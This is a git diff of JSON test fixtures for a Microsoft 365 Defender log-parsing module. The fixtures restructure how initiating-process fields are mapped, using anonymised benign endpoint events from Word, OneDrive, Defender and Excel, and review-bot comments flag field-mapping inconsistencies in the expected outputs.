\\\"I:\\\\COMPANY\\\\Service\\\\FILE.doc\\\" /o \\\"\\\"\",\"InitiatingProcessParentFileName\":\"explorer.exe\",\"InitiatingProcessParentId\":14616,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:47:41.9520775Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"winword.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files (x86)\\\\microsoft 
office\\\\root\\\\office16\\\\winword.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":\"f1d50e0d3e0ba197baf152614e0cd94487a1142e\",\"MD5\":\"5d5608654828cf052ba013b3c37cbb61\",\"FileName\":\"FILENAME.LNK\",\"FolderPath\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\Microsoft\\\\Office\\\\Recent\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"FileSizeInBytes\\\":914,\\\"VolumeGuidPath\\\":\\\"\\\\\\\\\\\\\\\\?\\\\\\\\Volume{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\\\",\\\"IsOnRemovableMedia\\\":false,\\\"ShellLinkRunAsAdmin\\\":false,\\\"ShellLinkShowCommand\\\":\\\"SW_SHOWNORMAL\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"SHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"RemoteUrl\":null,\"ProcessCreationTime\":\"2024-11-06T16:05:23.1138023Z\",\"ProcessTokenElevation\":null,\"ActionType\":\"ShellLinkCreateFileEvent\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":8066492,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JOHNDOE@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-abcd-5678-abcdef123456\",\"FileSize\":null,\"InitiatingProcessFileSize\":1621656,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Office\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"WinWord\",\"InitiatingProcessVersionInfoOriginalFileName\":\"WinWord.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft 
Word\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:23.3307226Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T10:17:23.330722Z", + "action": { + "properties": { + "process": { + "parent": { + "AccountObjectId": "abcdef90-1234-abcd-5678-abcdef123456", + "CommandLine": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", + "FileSize": 1621656, + "LogonId": "8066492", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Microsoft Word", + "VersionInfoInternalFileName": "WinWord", + "VersionInfoOriginalFileName": "WinWord.exe", + "VersionInfoProductName": "Microsoft Office", + "VersionInfoProductVersion": "16.0.17928.20216" + } + } + }, + "type": "ShellLinkCreateFileEvent" + }, + "file": { + "directory": "C:\\Users\\jdoe\\AppData\\Roaming\\Microsoft\\Office\\Recent", + "hash": { + "md5": "5d5608654828cf052ba013b3c37cbb61", + "sha1": "f1d50e0d3e0ba197baf152614e0cd94487a1142e", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "FILENAME.LNK" + }, + "host": { + "id": "abcdef0123456789", + "name": "user.company.local" + }, + "microsoft": { + "defender": { + "report": { + "id": "22722" + } + } + }, + "process": { + "name": "FILENAME.LNK", + "parent": { + "args": [ + "\"\"", + "\"I:\\COMPANY\\Service\\FILE.doc\"", + "/n", + "/o" + ], + "command_line": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", + "executable": "c:\\program files (x86)\\microsoft office\\root\\office16\\winword.exe", + "hash": { + "md5": 
"51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" + }, + "name": "winword.exe", + "pid": 20948, + "start": "2024-11-12T10:02:28.777910Z", + "user": { + "domain": "company", + "email": "JOHNDOE@COMPANY.COM", + "id": "S-1-2-3", + "name": "jdoe" + }, + "working_directory": "c:\\program files (x86)\\microsoft office\\root\\office16" + }, + "start": "2024-11-06T16:05:23.113802Z", + "working_directory": "C:\\Users\\jdoe\\AppData\\Roaming\\Microsoft\\Office" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "5d5608654828cf052ba013b3c37cbb61", + "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232", + "f1d50e0d3e0ba197baf152614e0cd94487a1142e" + ] + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_file_event.json b/Microsoft/microsoft-365-defender/tests/test_device_file_event.json index 7428190cf..94b70858f 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_file_event.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_file_event.json 
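Review bot: `process.working_directory` is pinned as `C:\Users\jdoe\AppData\Roaming\Microsoft\Office` while `file.directory` in the same expected block is `C:\Users\jdoe\AppData\Roaming\Microsoft\Office\Recent` and the input's `FolderPath` is that `Recent` directory; the expected value looks like the parent of `FolderPath`, as if a trailing file-name component were being stripped when none is present. The earlier SensitiveFileRead fixture shows the same shape (`file.directory: C:\Log` against `process.working_directory: C:`), so this is probably parser behaviour being pinned rather than a typo; if `FolderPath` is a directory for DeviceEvents, the line should become `"working_directory": "C:\\Users\\jdoe\\AppData\\Roaming\\Microsoft\\Office\\Recent"` once the parser is corrected. Separately, `InitiatingProcessParentFileName: explorer.exe` and `InitiatingProcessParentId: 14616` appear nowhere in the expected output, so the grandparent link is lost when the initiating process is demoted to `process.parent`.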
@@ -16,17 +16,19 @@
 "@timestamp": "2022-09-01T07:46:42.468408Z",
 "action": {
 "properties": {
- "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
- "InitiatingProcessCommandLine": "OneDriveSetup.exe /update /restart /updateSource:ODU /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode ",
- "InitiatingProcessFileSize": 56824728,
- "InitiatingProcessIntegrityLevel": "Medium",
- "InitiatingProcessTokenElevation": "TokenElevationTypeDefault",
- "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
- "InitiatingProcessVersionInfoFileDescription": "Microsoft OneDrive (64 bit) Setup",
- "InitiatingProcessVersionInfoInternalFileName": "OneDriveSetup.exe",
- "InitiatingProcessVersionInfoOriginalFileName": "OneDriveSetup.exe",
- "InitiatingProcessVersionInfoProductName": "Microsoft OneDrive",
- "InitiatingProcessVersionInfoProductVersion": "22.166.0807.0002"
+ "process": {
+ "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+ "CommandLine": "OneDriveSetup.exe /update /restart /updateSource:ODU /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode ",
+ "FileSize": 56824728,
+ "IntegrityLevel": "Medium",
+ "TokenElevation": "TokenElevationTypeDefault",
+ "VersionInfoCompanyName": "Microsoft Corporation",
+ "VersionInfoFileDescription": "Microsoft OneDrive (64 bit) Setup",
+ "VersionInfoInternalFileName": "OneDriveSetup.exe",
+ "VersionInfoOriginalFileName": "OneDriveSetup.exe",
+ "VersionInfoProductName": "Microsoft OneDrive",
+ "VersionInfoProductVersion": "22.166.0807.0002"
+ }
 },
 "type": "FileDeleted"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json b/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json
new file mode 100644
index 000000000..1a9daafcd
--- /dev/null
+++ b/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json 
@@ -0,0 +1,109 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-08T14:42:24.2882642Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceFileEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:41:06.9726687Z\",\"properties\":{\"SHA1\":\"8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264\",\"FileSize\":640920,\"MD5\":\"9a3af3a9ce0217bccce1d161e0b6bfde\",\"FileName\":\"FileName.dll\",\"FolderPath\":\"C:\\\\Program Files\\\\FileName.dll\",\"InitiatingProcessCommandLine\":\"commandexec.exe /V\",\"InitiatingProcessFileName\":\"commandexec.exe\",\"InitiatingProcessParentFileName\":\"services.exe\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\commandexec.exe\",\"InitiatingProcessParentCreationTime\":\"2024-10-09T01:02:27.2227081Z\",\"InitiatingProcessId\":16468,\"DeviceName\":\"device.company.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:23.2383083Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessParentId\":888,\"ReportId\":341972,\"SHA256\":\"30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595\",\"InitiatingProcessIntegrityLevel\":\"System\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"FileOriginReferrerUrl\":null,\"AppGuardContainerId\":\"\",\"ActionType\":\"FileCreated\",\"SensitivityLabel\":null,\"SensitivitySubLabel\":null,\"IsAzureInfoProtectionApplied\":null,\"RequestProtocol\":\"Local\",\"ShareName\":null,\"RequestSourceIP\":null,\"RequestSourcePort\":null,\"RequestAccountName\":\"Syst\u00e8me\",\"RequestAccountDomain\":\"ACCOUNT 
DOMAIN\",\"RequestAccountSid\":\"S-1-2-3\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AdditionalFields\":\"{\\\"FileType\\\":\\\"PortableExecutable\\\"}\",\"PreviousFolderPath\":\"\",\"PreviousFileName\":\"\",\"InitiatingProcessFileSize\":176128,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"commandexec\",\"InitiatingProcessVersionInfoOriginalFileName\":\"commandexec.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"InitiatingProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-08T14:38:51.9048761Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-08T14:42:24.2882642Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceFileEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:41:06.9726687Z\",\"properties\":{\"SHA1\":\"8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264\",\"FileSize\":640920,\"MD5\":\"9a3af3a9ce0217bccce1d161e0b6bfde\",\"FileName\":\"FileName.dll\",\"FolderPath\":\"C:\\\\Program Files\\\\FileName.dll\",\"InitiatingProcessCommandLine\":\"commandexec.exe 
/V\",\"InitiatingProcessFileName\":\"commandexec.exe\",\"InitiatingProcessParentFileName\":\"services.exe\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\commandexec.exe\",\"InitiatingProcessParentCreationTime\":\"2024-10-09T01:02:27.2227081Z\",\"InitiatingProcessId\":16468,\"DeviceName\":\"device.company.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:23.2383083Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessParentId\":888,\"ReportId\":341972,\"SHA256\":\"30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595\",\"InitiatingProcessIntegrityLevel\":\"System\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"FileOriginReferrerUrl\":null,\"AppGuardContainerId\":\"\",\"ActionType\":\"FileCreated\",\"SensitivityLabel\":null,\"SensitivitySubLabel\":null,\"IsAzureInfoProtectionApplied\":null,\"RequestProtocol\":\"Local\",\"ShareName\":null,\"RequestSourceIP\":null,\"RequestSourcePort\":null,\"RequestAccountName\":\"Syst\u00e8me\",\"RequestAccountDomain\":\"ACCOUNT DOMAIN\",\"RequestAccountSid\":\"S-1-2-3\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AdditionalFields\":\"{\\\"FileType\\\":\\\"PortableExecutable\\\"}\",\"PreviousFolderPath\":\"\",\"PreviousFileName\":\"\",\"InitiatingProcessFileSize\":176128,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - 
Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"commandexec\",\"InitiatingProcessVersionInfoOriginalFileName\":\"commandexec.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"InitiatingProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-08T14:38:51.9048761Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "file" + ], + "dataset": "device_file_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-08T14:38:51.904876Z", + "action": { + "properties": { + "RequestAccountSid": "S-1-2-3", + "process": { + "CommandLine": "commandexec.exe /V", + "FileSize": 176128, + "IntegrityLevel": "System", + "TokenElevation": "TokenElevationTypeDefault", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Windows\u00ae installer", + "VersionInfoInternalFileName": "commandexec", + "VersionInfoOriginalFileName": "commandexec.exe", + "VersionInfoProductName": "Windows Installer - Unicode", + "VersionInfoProductVersion": "5.0.22621.3880" + } + }, + "type": "FileCreated" + }, + "file": { + "directory": "C:\\Program Files\\FileName.dll", + "hash": { + "md5": "9a3af3a9ce0217bccce1d161e0b6bfde", + "sha1": "8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264", + "sha256": "30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595" + }, + "name": "FileName.dll", + "size": 640920 + }, + "host": { + "id": "123456789abcdef", + "name": "device.company.local" + }, + "microsoft": { + "defender": { + "report": { + "id": "341972" + } + } + }, + "network": { + "protocol": "Local" + }, + "process": { + "args": [ + "/V" + ], + "command_line": "commandexec.exe /V", + "executable": "c:\\windows\\system32\\commandexec.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": 
"44543e0c6f30415c670c1322e61ca68602d58708",
+ "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323"
+ },
+ "name": "commandexec.exe",
+ "parent": {
+ "name": "services.exe",
+ "pid": 888,
+ "start": "2024-10-09T01:02:27.222708Z"
+ },
+ "pid": 16468,
+ "start": "2024-11-08T14:38:23.238308Z",
+ "user": {
+ "domain": "account domain",
+ "id": "S-1-2-3",
+ "name": "syst\u00e8me"
+ },
+ "working_directory": "c:\\windows\\system32"
+ },
+ "related": {
+ "hash": [
+ "30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595",
+ "44543e0c6f30415c670c1322e61ca68602d58708",
+ "51a9cac9c4e8da44ffd7502be17604ee",
+ "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323",
+ "8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264",
+ "9a3af3a9ce0217bccce1d161e0b6bfde"
+ ],
+ "user": [
+ "Syst\u00e8me"
+ ]
+ },
+ "user": {
+ "domain": "ACCOUNT DOMAIN",
+ "name": "Syst\u00e8me"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json b/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json
index 497faa7bf..04559806a
--- a/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json
@@ -16,10 +16,12 @@
 "@timestamp": "2022-09-01T07:47:58.616127Z",
 "action": {
 "properties": {
- "InitiatingProcessCommandLine": "\"autosync.exe\" /c C:\\PROGRA~2\\adobe\\8.1\\Client\\bin\\fra\\adobe.cfg /c \" usa\"",
- "InitiatingProcessFileSize": 66560,
- "InitiatingProcessIntegrityLevel": "Medium",
- "InitiatingProcessTokenElevation": "TokenElevationTypeDefault"
+ "process": {
+ "CommandLine": "\"autosync.exe\" /c C:\\PROGRA~2\\adobe\\8.1\\Client\\bin\\fra\\adobe.cfg /c \" usa\"",
+ "FileSize": 66560,
+ "IntegrityLevel": "Medium",
+ "TokenElevation": "TokenElevationTypeDefault"
+ }
 },
 "type": "ImageLoaded"
 },
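Review bot: The new fixture pins `"directory": "C:\\Program Files\\FileName.dll"` under `file`, which is the full path including the file name that `file.name` already carries; ECS `file.directory` is the containing directory, so either the expectation should read `"directory": "C:\\Program Files"` or the verbatim copy of `FolderPath` is deliberate and deserves a comment in the parser, which is outside this diff. The same full-path value shows up in `file.directory` of the process_events_2 hunk further down (`C:\\Windows\\processcommand.exe`). `related.user` lists only `Syst\u00e8me` while `process.user.name` is `syst\u00e8me`; if `related.user` is meant to gather every account seen in the event, the initiating-process account is missing and the list should hold both spellings. The file ends with `\ No newline at end of file`; add the trailing newline.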
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json b/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json
index 15dc7a41b..e70edf395 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json
@@ -17,9 +17,11 @@
 "action": {
 "properties": {
 "AccountSid": "S-1-1-11-1-1",
- "InitiatingProcessCommandLine": "WinLogon.exe -SpecialSession",
 "LogonId": "111111",
- "LogonType": "Interactive"
+ "LogonType": "Interactive",
+ "process": {
+ "CommandLine": "WinLogon.exe -SpecialSession"
+ }
 },
 "type": "LogonSuccess"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_network_events.json b/Microsoft/microsoft-365-defender/tests/test_device_network_events.json
index 348f76f4e..75ab306b8 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_network_events.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_network_events.json
@@ -16,19 +16,21 @@
 "@timestamp": "2023-01-04T14:05:32.314862Z",
 "action": {
 "properties": {
- "InitiatingProcessAccountObjectId": "e0e5e759-c1e1-4cf9-91d5-c1099ef74614",
- "InitiatingProcessCommandLine": "\"EXCEL.EXE\" \"C:\\Users\\USER\\MyDocument.xslx",
- "InitiatingProcessFileSize": 63984520,
- "InitiatingProcessIntegrityLevel": "Medium",
- "InitiatingProcessTokenElevation": "TokenElevationTypeDefault",
- "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
- "InitiatingProcessVersionInfoFileDescription": "Microsoft Excel",
- "InitiatingProcessVersionInfoInternalFileName": "Excel",
- "InitiatingProcessVersionInfoOriginalFileName": "Excel.exe",
- "InitiatingProcessVersionInfoProductName": "Microsoft Office",
- "InitiatingProcessVersionInfoProductVersion": "16.0.15601.20538",
 "LocalIPType": "Private",
- "RemoteIPType": "Public"
+ "RemoteIPType": "Public",
+ "process": {
+ "AccountObjectId": "e0e5e759-c1e1-4cf9-91d5-c1099ef74614",
+ "CommandLine": "\"EXCEL.EXE\" \"C:\\Users\\USER\\MyDocument.xslx",
+ "FileSize": 63984520,
+ "IntegrityLevel": "Medium",
+ "TokenElevation": "TokenElevationTypeDefault",
+ "VersionInfoCompanyName": "Microsoft Corporation",
+ "VersionInfoFileDescription": "Microsoft Excel",
+ "VersionInfoInternalFileName": "Excel",
+ "VersionInfoOriginalFileName": "Excel.exe",
+ "VersionInfoProductName": "Microsoft Office",
+ "VersionInfoProductVersion": "16.0.15601.20538"
+ }
 },
 "type": "ConnectionSuccess"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_created.json b/Microsoft/microsoft-365-defender/tests/test_device_process_created.json
index cd2ca7981..7acf31f01 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_process_created.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_process_created.json
@@ -29,9 +29,11 @@
 }
 },
 "process": {
- "user": {
- "domain": "autorite nt",
- "name": "syst\u00e8me"
+ "parent": {
+ "user": {
+ "domain": "autorite nt",
+ "name": "syst\u00e8me"
+ }
 }
 }
 }
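Review bot: On the new side the `process` object of test_device_process_created.json holds only `parent.user`; the created process's own `process.user` block is removed rather than kept beside it. In DeviceProcessEvents the unprefixed `AccountName`/`AccountDomain` describe the created process and `InitiatingProcessAccount*` the parent, so moving the existing values to `parent.user` is right only if this fixture's input (outside the hunk) has no unprefixed account fields; if it does, the expectation should also keep `"user": { "domain": ..., "name": ... }` directly under `process`. A quick check of the input's `AccountName` settles which shape is correct.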
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json
index 7d72e6264..3847a138b 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json
@@ -17,25 +17,30 @@ "action": { "properties": { "AccountSid": "S-1-1-11", - "InitiatingProcessCommandLine": "\"MsMpEng.exe\"", - "InitiatingProcessFileSize": 133576, - "InitiatingProcessIntegrityLevel": "System", - "InitiatingProcessLogonId": "999", - "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", - "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", - "InitiatingProcessVersionInfoFileDescription": "Antimalware Service Executable", - "InitiatingProcessVersionInfoInternalFileName": "MsMpEng.exe", - "InitiatingProcessVersionInfoOriginalFileName": "MsMpEng.exe", - "InitiatingProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", - "InitiatingProcessVersionInfoProductVersion": "4.18.2301.6", "LogonId": "999", - "ProcessIntegrityLevel": "System", - "ProcessVersionInfoCompanyName": "Microsoft Corporation", - "ProcessVersionInfoFileDescription": "Microsoft Malware Protection Command Line Utility", - "ProcessVersionInfoInternalFileName": "MpCmdRun", - "ProcessVersionInfoOriginalFileName": "MpCmdRun.exe", - "ProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", - "ProcessVersionInfoProductVersion": "4.18.2301.6" + "process": { + "IntegrityLevel": "System", + "TokenElevation": "TokenElevationTypeDefault", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Microsoft Malware Protection Command Line Utility", + "VersionInfoInternalFileName": "MpCmdRun", + "VersionInfoOriginalFileName": "MpCmdRun.exe", + "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "VersionInfoProductVersion": "4.18.2301.6", + "parent": { + "CommandLine": "\"MsMpEng.exe\"", + "FileSize": 133576, + "IntegrityLevel": "System", + "LogonId": "999", + "TokenElevation": "TokenElevationTypeDefault", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Antimalware Service Executable", + "VersionInfoInternalFileName": "MsMpEng.exe", + 
"VersionInfoOriginalFileName": "MsMpEng.exe", + "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "VersionInfoProductVersion": "4.18.2301.6" + } + } }, "type": "ProcessCreated" }, @@ -69,31 +74,33 @@ "54", "Scan" ], - "code_signature": { - "status": "Valid", - "subject_name": "OsVendor" - }, "command_line": "\"MpCmdRun.exe\" Scan -ScheduleJob -RestrictPrivileges -DailyScan -ScanTrigger 54", - "executable": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0\\msmpeng.exe", - "hash": { - "md5": "5d5608654828cf052ba013b3c37cbb61", - "sha1": "5bfbb0f965e2761d75a51faacc9db6a146a7c5ae", - "sha256": "52bd0a4d149f7913b9c3ba111eff1e75188abfcdc54b927390bc3bfad419860e" - }, - "name": "MsMpEng.exe", + "name": "MpCmdRun.exe", "parent": { - "name": "services.exe", - "pid": 1032, - "start": "2023-01-03T08:51:26.740241Z" + "code_signature": { + "status": "Valid", + "subject_name": "OsVendor" + }, + "command_line": "\"MsMpEng.exe\"", + "executable": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0\\msmpeng.exe", + "hash": { + "md5": "5d5608654828cf052ba013b3c37cbb61", + "sha1": "5bfbb0f965e2761d75a51faacc9db6a146a7c5ae", + "sha256": "52bd0a4d149f7913b9c3ba111eff1e75188abfcdc54b927390bc3bfad419860e" + }, + "name": "MsMpEng.exe", + "pid": 5456, + "start": "2023-01-03T08:51:29.269279Z", + "user": { + "domain": "NT", + "id": "S-1-1-11", + "name": "System" + }, + "working_directory": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0" }, "pid": 37788, "start": "2023-01-04T14:15:10.355033Z", - "user": { - "domain": "NT", - "id": "S-1-1-11", - "name": "System" - }, - "working_directory": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0" + "working_directory": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2301.6-0" }, "related": { "hash": [ 
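Review bot: After the re-levelling in the second hunk of test_device_process_events.json the created process (`MpCmdRun.exe`) keeps `command_line`, `name`, `pid`, `start` and `working_directory`, while `executable`, `hash` and `code_signature` move to `parent` with nothing taking their place for the child in the visible lines; if the input carries `FolderPath` and `SHA1`/`MD5`/`SHA256` for the created process, as the process_events_2 fixture in this commit does, `process.executable` and `process.hash` should be expected for the child too unless they are intentionally mapped only to `file.*`. The former parent entry (`services.exe`, pid 1032, start `2023-01-03T08:51:26.740241Z`, from `InitiatingProcessParent*`) no longer appears anywhere on the new side, so one level of lineage is dropped from the normalised event; detection content keyed on the grandparent will stop matching, which deserves a mention in the commit description if intended. The enclosing `process` object starts before this hunk.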
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
index d2e83b32a..cac1e9791 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
